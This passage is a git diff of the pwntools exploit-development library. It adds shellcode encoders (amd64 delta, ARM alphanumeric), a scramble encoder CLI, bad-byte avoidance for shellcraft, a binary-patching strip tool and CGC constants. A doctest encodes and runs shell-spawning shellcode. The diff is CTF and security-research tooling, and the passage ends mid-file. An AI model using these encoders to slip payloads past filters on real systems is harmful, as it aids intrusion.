dd7377657..f6873d2ba 100644 --- a/pwnlib/commandline/common.py +++ b/pwnlib/commandline/common.py @@ -1,4 +1,6 @@ -from pwn import * +import sys +import pwnlib +from pwnlib.context import context pwnlib.log.console.stream = sys.stderr diff --git a/pwnlib/commandline/constgrep.py b/pwnlib/commandline/constgrep.py index ef3a30dc6..153432781 100644 --- a/pwnlib/commandline/constgrep.py +++ b/pwnlib/commandline/constgrep.py @@ -4,7 +4,9 @@ import os import re -from pwn import * +from pwnlib.context import context +from pwnlib import constants +from pwnlib.asm import cpp from . import common diff --git a/pwnlib/commandline/elfdiff.py b/pwnlib/commandline/elfdiff.py index 8f2e7c357..4d6438f67 100644 --- a/pwnlib/commandline/elfdiff.py +++ b/pwnlib/commandline/elfdiff.py @@ -3,11 +3,11 @@ from subprocess import CalledProcessError from subprocess import check_output from tempfile import NamedTemporaryFile +from pwn import * - -def dump(x): +def dump(objdump, elf): n = NamedTemporaryFile(delete=False) - o = check_output(['objdump','-d','-x','-s',x]) + o = check_output([objdump,'-d','-x','-s',elf.path]) n.write(o) n.flush() return n.name @@ -23,7 +23,19 @@ def diff(a,b): p.add_argument('b') def main(): - a = p.parse_args() - print diff(dump(a.a), dump(a.b)) + a = p.parse_args() + + with context.silent: + x = ELF(a.a) + y = ELF(a.b) + + if x.arch != y.arch: + log.error("Architectures are not the same: %s vs %s" % (x.arch, y.arch)) + + context.arch = x.arch + + objdump = pwnlib.asm.which_binutils('objdump') + + print diff(dump(objdump, x), dump(objdump, y)) if __name__ == '__main__': main() diff --git a/pwnlib/commandline/pwnstrip.py b/pwnlib/commandline/pwnstrip.py new file mode 100644 index 000000000..6b40fc705 --- /dev/null +++ b/pwnlib/commandline/pwnstrip.py @@ -0,0 +1,53 @@ +import argparse + +from pwn import * + +from . import common + +p = argparse.ArgumentParser( + description = 'Strip binaries for CTF usage', + formatter_class = argparse.RawDescriptionHelpFormatter, +) + +g = p.add_argument_group("actions") +g.add_argument('-b', '--build-id', help="Strip build ID", action='store_true') +g.add_argument('-p', '--patch', metavar='FUNCTION', help="Patch function", action='append') +p.add_argument('-o', '--output', type=file, default=sys.stdout) +p.add_argument('file', type=file) + +def main(): + args = p.parse_args() + + if not (args.patch or args.build_id): + sys.stderr.write("Must specify at least one action\n") + sys.stderr.write(p.format_usage()) + sys.exit(0) + + elf = ELF(args.file.name) + context.clear(arch=elf.arch) + + if args.build_id: + for offset in pwnlib.libcdb.get_build_id_offsets(): + data = elf.read(elf.address + offset + 0xC, 4) + if data == 'GNU\x00': + elf.write(elf.address + offset + 0x10, read('/dev/urandom', 20)) + + for function in args.patch: + if function not in elf.symbols: + log.error("Could not find function %r" % function) + + trap = asm(shellcraft.trap()) + offset = elf.symbols[function] + + elf.write(elf.address + offset, trap) + + result = elf.data + + if args.output.isatty(): + result = enhex(result) + + args.output.write(result) + + +if __name__ == '__main__': + main() diff --git a/pwnlib/commandline/scramble.py b/pwnlib/commandline/scramble.py new file mode 100644 index 000000000..f95a6eaae --- /dev/null +++ b/pwnlib/commandline/scramble.py @@ -0,0 +1,103 @@ +import argparse +import sys + +from pwn import * + +from . import common + +parser = argparse.ArgumentParser( + description = 'Shellcode encoder' +) + + +parser.add_argument( + "-f", "--format", + help="Output format (defaults to hex for ttys, otherwise raw)", + choices=['raw', 'hex', 'string', 'elf'] +) + +parser.add_argument( + "-o","--output", + metavar='file', + help="Output file (defaults to stdout)", + type=argparse.FileType('w'), + default=sys.stdout +) + +parser.add_argument( + '-c', '--context', + metavar = 'context', + action = 'append', + type = common.context_arg, + choices = common.choices, + help = 'The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: %s' % common.choices, +) + +parser.add_argument( + '-p', '--alphanumeric', + action='store_true', + help = 'Encode the shellcode with an alphanumeric encoder' +) + +parser.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes' +) + +parser.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +parser.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + +parser.add_argument( + '-d', + '--debug', + help='Debug the shellcode with GDB', + action='store_true' +) + +def main(): + args = parser.parse_args() + tty = args.output.isatty() + + if sys.stdin.isatty(): + parser.print_usage() + sys.exit(0) + + data = sys.stdin.read() + output = data + fmt = args.format or ('hex' if tty else 'raw') + formatters = {'r':str, 'h':enhex, 's':repr} + + if args.alphanumeric: + output = alphanumeric(output) + + if args.avoid: + output = avoid(output, ''.join(args.avoid)) + + if args.debug: + proc = gdb.debug_shellcode(output, arch=context.arch) + proc.interactive() + sys.exit(0) + + if fmt[0] == 'e': + sys.stdout.write(make_elf(output)) + else: + args.output.write(formatters[fmt[0]](output)) + + if tty and fmt is not 'raw': + args.output.write('\n') + +if __name__ == '__main__': main() diff --git a/pwnlib/commandline/shellcraft.py b/pwnlib/commandline/shellcraft.py index e9953fac0..c874223c2 100644 --- a/pwnlib/commandline/shellcraft.py +++ b/pwnlib/commandline/shellcraft.py @@ -112,6 +112,28 @@ def _string(s): action='store_true' ) +p.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes' +) + +p.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +p.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + p.add_argument( '-r', '--run', @@ -133,6 +155,27 @@ def _string(s): dest='color' ) +p.add_argument( + '--syscalls', + help="List syscalls", + action='store_true' +) + +p.add_argument( + '--address', + help="Load address", + default=None +) + +def get_template(name): + func = shellcraft + for attr in name.split('.'): + func = getattr(func, attr) + return func + +def is_not_a_syscall_template(name): + template_src = shellcraft._get_source(name) + return 'man 2' not in read(template_src) def main(): # Banner must be added here so that it doesn't appear in the autodoc @@ -141,12 +184,15 @@ def main(): args = p.parse_args() if not args.shellcode: - print '\n'.join(shellcraft.templates) + templates = shellcraft.templates + + if not args.syscalls: + templates = filter(is_not_a_syscall_template, templates) + + print '\n'.join(templates) exit() - func = shellcraft - for attr in args.shellcode.split('.'): - func = getattr(func, attr) + func = get_template(args.shellcode) if args.show: # remove doctests @@ -236,13 +282,27 @@ def main(): print cpp(code) exit() + assembly = code + + vma = args.address + if vma: + vma = eval(vma) if args.format in ['e','elf']: args.format = 'default' - code = read(make_elf_from_assembly(code, vma=None)) - os.fchmod(args.out.fileno(), 0700) + try: os.fchmod(args.out.fileno(), 0700) + except OSError: pass + + + if not args.avoid: + code = read(make_elf_from_assembly(assembly, vma=vma)) + else: + code = asm(assembly) + code = encode(code, args.avoid) + code = make_elf(code, vma=vma) + # code = read(make_elf(encode(asm(code), args.avoid))) else: - code = asm(code) + code = encode(asm(assembly), args.avoid) if args.format == 'default': if args.out.isatty(): @@ -253,7 +313,10 @@ def main(): arch = args.shellcode.split('.')[0] if args.debug: - proc = gdb.debug_shellcode(code, arch=arch) + if not args.avoid: + proc = gdb.debug_assembly(assembly, arch=arch, vma=vma) + else: + proc = gdb.debug_shellcode(code, arch=arch, vma=vma) proc.interactive() sys.exit(0) diff --git a/pwnlib/constants/cgc/__init__.py b/pwnlib/constants/cgc/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/constants/cgc/aarch64.py b/pwnlib/constants/cgc/aarch64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/aarch64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/alpha.py b/pwnlib/constants/cgc/alpha.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/alpha.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/amd64.py b/pwnlib/constants/cgc/amd64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/amd64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/arm.py b/pwnlib/constants/cgc/arm.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/arm.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/i386.py b/pwnlib/constants/cgc/i386.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/i386.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/ia64.py b/pwnlib/constants/cgc/ia64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/ia64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/mips.py b/pwnlib/constants/cgc/mips.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/mips.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/powerpc.py b/pwnlib/constants/cgc/powerpc.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/powerpc.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/powerpc64.py b/pwnlib/constants/cgc/powerpc64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/powerpc64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/s390.py b/pwnlib/constants/cgc/s390.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/s390.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/s390x.py b/pwnlib/constants/cgc/s390x.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/s390x.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/sparc.py b/pwnlib/constants/cgc/sparc.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/sparc.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/sparc64.py b/pwnlib/constants/cgc/sparc64.py new file mode 120000 index 000000000..e928d5db9 --- /dev/null +++ b/pwnlib/constants/cgc/sparc64.py @@ -0,0 +1 @@ +thumb.py \ No newline at end of file diff --git a/pwnlib/constants/cgc/thumb.py b/pwnlib/constants/cgc/thumb.py new file mode 100644 index 000000000..108c541f3 --- /dev/null +++ b/pwnlib/constants/cgc/thumb.py @@ -0,0 +1,28 @@ +from pwnlib.constants.constant import Constant +terminate = Constant('terminate', 1) +SYS_terminate = Constant('SYS_terminate', 1) +__NR_terminate = Constant('__NR_terminate', 1) + +transmit = Constant('transmit', 2) +SYS_transmit = Constant('SYS_transmit', 2) +__NR_transmit = Constant('__NR_transmit', 2) + +receive = Constant('receive', 3) +SYS_receive = Constant('SYS_receive', 3) +__NR_receive = Constant('__NR_receive', 3) + +fdwait = Constant('fdwait', 4) +SYS_fdwait = Constant('SYS_fdwait', 4) +__NR_fdwait = Constant('__NR_fdwait', 4) + +allocate = Constant('allocate', 5) +SYS_allocate = Constant('SYS_allocate', 5) +__NR_allocate = Constant('__NR_allocate', 5) + +deallocate = Constant('deallocate', 6) +SYS_deallocate = Constant('SYS_deallocate', 6) +__NR_deallocate = Constant('__NR_deallocate', 6) + +random = Constant('random', 7) +SYS_random = Constant('SYS_random', 7) +__NR_random = Constant('__NR_random', 7) diff --git a/pwnlib/context/__init__.py b/pwnlib/context/__init__.py index 24886d718..02bfb5438 100644 --- a/pwnlib/context/__init__.py +++ b/pwnlib/context/__init__.py @@ -7,6 +7,7 @@ import collections import functools import logging +import os import platform import string import sys @@ -323,6 +324,7 @@ class ContextType(object): 'kernel': None, 'log_level': logging.INFO, 'log_file': _devnull(), + 'randomize': False, 'newline': '\n', 'os': 'linux', 'signed': False, @@ -331,7 +333,7 @@ class ContextType(object): } #: Valid values for :meth:`pwnlib.context.ContextType.os` - oses = sorted(('linux','freebsd','windows')) + oses = sorted(('linux','freebsd','windows','cgc')) big_32 = {'endian': 'big', 'bits': 32} big_64 = {'endian': 'big', 'bits': 64} @@ -494,6 +496,10 @@ def __exit__(a, *b, **c): return LocalContext() + @property + def silent(self): + return self.local(log_level='error') + def clear(self, *a, **kw): """ Clears the contents of the context. @@ -864,6 +870,13 @@ def os(self, os): return os + @_validator + def randomize(self, r): + """ + Global flag that lots of things should be randomized. + """ + return bool(r) + @_validator def signed(self, signed): """ @@ -923,6 +936,11 @@ def terminal(self, value): return [value] return value + @property + def abi(self): + return self._abi + + #************************************************************************* # ALIASES #************************************************************************* diff --git a/pwnlib/data/includes/cgc/aarch64.h b/pwnlib/data/includes/cgc/aarch64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/aarch64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/alpha.h b/pwnlib/data/includes/cgc/alpha.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/alpha.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/amd64.h b/pwnlib/data/includes/cgc/amd64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/amd64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/arm.h b/pwnlib/data/includes/cgc/arm.h new file mode 100644 index 000000000..34810e7ce --- /dev/null +++ b/pwnlib/data/includes/cgc/arm.h @@ -0,0 +1,21 @@ +#define allocate 5 +#define SYS_allocate 5 +#define __NR_allocate 5 +#define deallocate 6 +#define SYS_deallocate 6 +#define __NR_deallocate 6 +#define fdwait 4 +#define SYS_fdwait 4 +#define __NR_fdwait 4 +#define random 7 +#define SYS_random 7 +#define __NR_random 7 +#define receive 3 +#define SYS_receive 3 +#define __NR_receive 3 +#define terminate 1 +#define SYS_terminate 1 +#define __NR_terminate 1 +#define transmit 2 +#define SYS_transmit 2 +#define __NR_transmit 2 diff --git a/pwnlib/data/includes/cgc/i386.h b/pwnlib/data/includes/cgc/i386.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/i386.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/ia64.h b/pwnlib/data/includes/cgc/ia64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/ia64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/mips.h b/pwnlib/data/includes/cgc/mips.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/mips.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/powerpc.h b/pwnlib/data/includes/cgc/powerpc.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/powerpc.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/powerpc64.h b/pwnlib/data/includes/cgc/powerpc64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/powerpc64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/s390.h b/pwnlib/data/includes/cgc/s390.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/s390.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/s390x.h b/pwnlib/data/includes/cgc/s390x.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/s390x.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/sparc.h b/pwnlib/data/includes/cgc/sparc.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/sparc.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/sparc64.h b/pwnlib/data/includes/cgc/sparc64.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/sparc64.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/data/includes/cgc/thumb.h b/pwnlib/data/includes/cgc/thumb.h new file mode 120000 index 000000000..6ea514176 --- /dev/null +++ b/pwnlib/data/includes/cgc/thumb.h @@ -0,0 +1 @@ +arm.h \ No newline at end of file diff --git a/pwnlib/dynelf.py b/pwnlib/dynelf.py index d347687cb..ca972099c 100644 --- a/pwnlib/dynelf.py +++ b/pwnlib/dynelf.py @@ -495,6 +495,10 @@ def lookup (self, symb = None, lib = None): if lib: dynlib = self._dynamic_load_dynelf(lib) else: dynlib = self + if dynlib is None: + log.failure("Could not find %r" % lib) + return None + # # If we are resolving a symbol in the library, find it. # @@ -502,6 +506,7 @@ def lookup (self, symb = None, lib = None): # Try a quick lookup by build ID self.status("Trying lookup based on Build ID") build_id = dynlib._lookup_build_id(lib=lib) + result = None if build_id: log.info("Trying lookup based on Build ID: %s" % build_id) path = libcdb.search_by_build_id(build_id) @@ -769,6 +774,9 @@ def _lookup_build_id(self, lib = None): if lib is not None: libbase = self.lookup(symb = None, lib = lib) + if not libbase: + return None + for offset in libcdb.get_build_id_offsets(): address = libbase + offset if self.leak.d(address + 0xC) == unpack("GNU\x00", 32): diff --git a/pwnlib/encoders/__init__.py b/pwnlib/encoders/__init__.py index c7c164994..31a3850fd 100644 --- a/pwnlib/encoders/__init__.py +++ b/pwnlib/encoders/__init__.py @@ -5,4 +5,11 @@ from . import amd64 from . import arm from . import i386 -from .encoder import * +from . import mips +from .encoder import alphanumeric +from .encoder import encode +from .encoder import Encoder +from .encoder import line +from .encoder import null +from .encoder import printable +from .encoder import scramble diff --git a/pwnlib/encoders/amd64/__init__.py b/pwnlib/encoders/amd64/__init__.py index e69de29bb..6614eabf9 100644 --- a/pwnlib/encoders/amd64/__init__.py +++ b/pwnlib/encoders/amd64/__init__.py @@ -0,0 +1 @@ +from . import delta \ No newline at end of file diff --git a/pwnlib/encoders/amd64/delta.py b/pwnlib/encoders/amd64/delta.py new file mode 100644 index 000000000..208ea6d60 --- /dev/null +++ b/pwnlib/encoders/amd64/delta.py @@ -0,0 +1,42 @@ +from ..i386.delta import i386DeltaEncoder + +class amd64DeltaEncoder(i386DeltaEncoder): + """ + amd64 encoder built on delta-encoding. + + In addition to the loader stub, doubles the size of the shellcode. + + >>> context.clear(arch='amd64') + >>> shellcode = asm(shellcraft.sh()) + >>> avoid = '/bin/sh\x00' + >>> encoded = pwnlib.encoders.amd64.delta.encode(shellcode, avoid) + >>> assert not any(c in encoded for c in avoid) + >>> p = run_shellcode(encoded) + >>> p.sendline('echo hello; exit') + >>> p.recvline() + """ + assembly = ''' +base: + lea rsi, base[rip] + /* add rsi, (data-base) */ + .byte 0x48, 0x83, 0xc6, (data - base) + cld + mov rdi, rsi + +next: + lodsb + xchg eax, ebx + lodsb + sub al, bl + stosb + sub bl, 0xac + jnz next + +data: +''' + arch = 'amd64' + raw = 'H\x8d5\xf9\xff\xff\xffH\x83\xc6\x1a\xfcH\x89\xf7\xac\x93\xac(\xd8\xaa\x80\xeb\xacu\xf5' + blacklist = set(raw) + +encode = amd64DeltaEncoder() +__all__ = [encode] diff --git a/pwnlib/encoders/arm/__init__.py b/pwnlib/encoders/arm/__init__.py index e69de29bb..1411fa57d 100644 --- a/pwnlib/encoders/arm/__init__.py +++ b/pwnlib/encoders/arm/__init__.py @@ -0,0 +1,2 @@ +from . import alphanumeric +from . import xor diff --git a/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py b/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py new file mode 100755 index 000000000..2ee52378e --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py @@ -0,0 +1,139 @@ + + +# +------------------------------------------------------------------------+ +# | ARM Instructions | +# +------------------------------------------------------------------------+ + + +EOR = 1 +SUB = 2 +RSB = 3 +MI = 4 +PL = 5 +LDR = 6 +STR = 7 +LDM = 8 +STM = 9 +ROR = 10 +LSR = 11 + +# (EOR/SUB/RSB)(PL/MI){S} rd, rn, #imm +# ==================================== +def dpimm(op, cond, s, d, n, imm): + if type(imm) == int: + x = chr(imm & 0xff) + else: + x = imm + x += chr((d << 4) & 0xff) + if s: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + if cond == PL: + x += "\x52" + else: + x += "\x42" + return x + +# (EOR/SUB/RSB)PL{S} rd, rn, ra ROR #imm +# ====================================== +def dpshiftimm(op, s, d, n, a, imm): + x = chr(0x60 | a) + x += chr(((d << 4)| (imm >> 1)) & 0xff) + if s: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + return x + "\x50" + +# (EOR/SUB/RSB)PL{S} rd, rn, ra (ROR/LSR) rb +# ========================================== +def dpshiftreg(op, s, d, n, a, shift, b): + x = '' + if shift == LSR: + x += chr(0x30 | a) + else: + x += chr(0x70 | a) + x += chr(((d << 4) | b) & 0xff) + if s != 0: + if op == EOR: + x += chr(0x30 | n) + if op == SUB: + x += chr(0x50 | n) + if op == RSB: + x += chr(0x70 | n) + else: + if op == SUB: + x += chr(0x40 | n) + if op == RSB: + x += chr(0x60 | n) + return x + "\x50" + +# (LDR/STR)(PL/MI)B rd, [rn, #-imm] +# ================================= +def lsbyte(op, cond, d, n, imm): + if type(imm) == int: + x = chr(imm & 0xff) + else: + x = imm + x += chr((d << 4) & 0xff) +# x = chr(imm) + chr((d << 4) & 0xff) + if op == STR: + x += chr(0x40 | n) + else: + x += chr(0x50 | n) + if cond == PL: + x += "\x55" + else: + x += "\x45" + return x + +# STMPLFD rd, (Register List)^ +# ============================ +def smul(d, reglH, reglL): + return chr(reglL) + chr(reglH) + chr(0x40 | d) + "\x59" + +# LDMPLDB rn!, (Register List) +# ============================ +def lmul(n, reglH, reglL): + return chr(reglL) + chr(reglH) + chr(0x30 | n) + "\x59" + +# SWI(PL/MI) 0x9f0002 +# ============== +def swi(cond): + x = "\x02\x00\x9f" + if cond == MI: + x += "\x4f" + else: + x += "\x5f" + return x + +# BMI 0xfffff4 +# ============ +def bmi(): + return "\xf4\xff\xff\x4b" + +# STRPLB rd, [!rn, -(rm ROR #imm)] with P=0 i.e. post-indexed addressing mode +# =========================================================================== +def sbyteposti(d, n, m, imm): + x = chr(0x60 | m) + x += chr(((d << 4) | (imm >> 1)) & 0xff) + x += chr(0x40 | n) + x += "\x56" + return x diff --git a/pwnlib/encoders/arm/alphanumeric/__init__.py b/pwnlib/encoders/arm/alphanumeric/__init__.py new file mode 100644 index 000000000..3087285bc --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/__init__.py @@ -0,0 +1,47 @@ +import builder +import binascii +import random +import sys +import string + +from ...encoder import Encoder +from ....context import context + +class ArmEncoder(Encoder): + arch = 'arm' + + blacklist = {chr(c) for c in range(256) if chr(c) in (string.ascii_letters + string.digits)} + + def __call__(self, input, avoid, pcreg=None): + + icache_flush = 1 + + # If randomization is disabled, ensure that the seed + # is always the same for the builder. + state = random.getstate() + if not context.randomize: + random.seed(1) + + try: + b = builder.builder() + + enc_data = b.enc_data_builder(input) + dec_loop = b.DecoderLoopBuilder(icache_flush) + enc_dec_loop = b.encDecoderLoopBuilder(dec_loop) + dec = b.DecoderBuilder(dec_loop, icache_flush) + + output,dec = b.buildInit(dec); + + output += dec + output += enc_dec_loop + output += enc_data + + finally: + random.setstate(state) + + return output + +class ThumbEncoder(ArmEncoder): + arch = 'thumb' + +encode = ArmEncoder() diff --git a/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py b/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py new file mode 100755 index 000000000..0d06cc4c8 --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/alphanum_byte.py @@ -0,0 +1,49 @@ +import random_funcs + +# +------------------------------------------------------------------------+ +# | ALPHANUMERIC MANIPULATIONS FUNCTIONS | +# +------------------------------------------------------------------------+ + +ALPHANUMERIC_BYTES = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + +# return 1 if the byte is alphanumeric +# ==================================== +def alphanumeric_check(c): + if type(c) == int: + c = chr(c & 0xff) + return c.isalnum() + + +# return a random alphanumeric byte +# ================================= +def alphanumeric_get_byte(): + return ord(random_funcs.randel(ALPHANUMERIC_BYTES)) + +# return a randomly selected alphanumeric byte less than max +# ========================================================== +#CSE author actually returns a byte <= max, not strictly < max +def alphanumeric_get_byte_ltmax(max): + sz = 0 + while sz < len(ALPHANUMERIC_BYTES) and ord(ALPHANUMERIC_BYTES[sz]) <= max: + sz += 1 + return ord(random_funcs.randel(ALPHANUMERIC_BYTES[:sz])) + +# generate an alphanumeric offset such that c+offset is also alphanumeric +# ======================================================================= +def off_gen(c): + if c >= 0 and c <= 0x4a: + max = 16 * 7 + 10 - c + while True: + x = alphanumeric_get_byte_ltmax(max) + if alphanumeric_check(c + x): + return x + return 0 + +# return an alphanumeric value ret such that c XOR ret is also alphanumeric +# ========================================================================= +def alphanumeric_get_complement(c): + c &= 0xff; + while True: + ret = alphanumeric_get_byte() + if alphanumeric_check(c ^ ret): + return ret diff --git a/pwnlib/encoders/arm/alphanumeric/alphanumeric.py b/pwnlib/encoders/arm/alphanumeric/alphanumeric.py new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/encoders/arm/alphanumeric/builder.py b/pwnlib/encoders/arm/alphanumeric/builder.py new file mode 100755 index 000000000..aa10a958e --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/builder.py @@ -0,0 +1,454 @@ +import random_funcs +import ARM_Instructions +import builder +import alphanum_byte + +#+---------------------------------------------------+*/ +#| Builder Functions |*/ +#+---------------------------------------------------+*/ + +EOR = 1 +SUB = 2 +RSB = 3 +MI = 4 +PL = 5 +LDR = 6 +STR = 7 +LDM = 8 +STM = 9 +ROR = 10 +LSR = 11 + +class builder: + + def __init__(self): + self.I = 0 + self.size = 0 + self.i = 0 + self.j = 0 + self.k = 0 + self.x = 0 + self.addr = 0 + self.addr_offset = 0 + + def enc_data_builder(self, input): + if len(input) == 0: + return '' + output = '' + arr = [1,2,3,4,5,6,7,8,9] + self.I = random_funcs.randel(arr) + p = 0 + for p in range(len(input)): + ab = input[p] + b = ord(ab) & 0x0f + e0 = random_funcs.enc_data_msn(b, self.I) + e0 = e0 << 4 + ef = e0 | b + d = ((ord(ab) & 0xf0) ^ e0) >> 4 + c0 = random_funcs.enc_data_msn(d, self.I) << 4 + cd = c0 | d + output += chr(cd & 0xff) + output += chr(ef & 0xff) + #Last two bytes to stop the decoder_loop*/ + max = 0x30 | self.I + output += chr(alphanum_byte.alphanumeric_get_byte()) + output += chr(alphanum_byte.alphanumeric_get_byte_ltmax(max)) + return output + + def DecoderLoopBuilder(self, icache_flush): + dec_loop = '' + # Select p,s,t and q */ + arr = [3, 7] + p = random_funcs.randel(arr) + if p == 3: + s = 7 + else: + s = 3 + t = 6 + arr2 = [8, 9] + q = random_funcs.randel(arr2) + + # Add the instructions*/ + if icache_flush != 0: + dec_loop += ARM_Instructions.swi(MI) + + rsalnum = alphanum_byte.alphanumeric_get_byte() + + if icache_flush != 0: + #EORMIS rp, r4, #(randomly selected alphanumeric value)*/ + dec_loop += ARM_Instructions.dpimm(EOR, MI, 1, p, 4, rsalnum) + + if icache_flush == 1: + dist = 0x2c + else: + dist = 0x28 + + offset = alphanum_byte.off_gen(dist + 0x04) + + #SUBPL rs, r4, #(dist+0x04+offset)*/ + dec_loop += ARM_Instructions.dpimm(SUB, PL, 0, s, 4, chr(dist + 0x04 + offset)) + + #SUBPL rs, pc, rs LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, s, 0x0f, s, LSR, 4) + + #EORPLS rt, r4, rs LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(EOR, 1, t, 4, s, LSR, 4) + + #EORMIS rp, r4, #rsalnum*/ + rsalnum = alphanum_byte.alphanumeric_get_byte() + dec_loop += ARM_Instructions.dpimm(EOR, MI, 1, p, 4, rsalnum) + + #LDRPLB rp, [rs, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(LDR, PL, p, s, offset) + + #SUBPL rs, rs, r5 LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, s, s, 5, LSR, 4) + + #LDRPLB rq, [rs, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(LDR, PL, q, s, offset) + + #EORPLS rp, rq, rp ROR #28*/ + dec_loop += ARM_Instructions.dpshiftimm(EOR, 1, p, q, p, 28) + + #STRPLB rp, [rt, #(-offset)]*/ + dec_loop += ARM_Instructions.lsbyte(STR, PL, p, t, offset) + + #SUBPL rt, rt, r5 LSR r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, t, t, 5, LSR, 4) + + #SUBPL rs, rs, r5 LSR 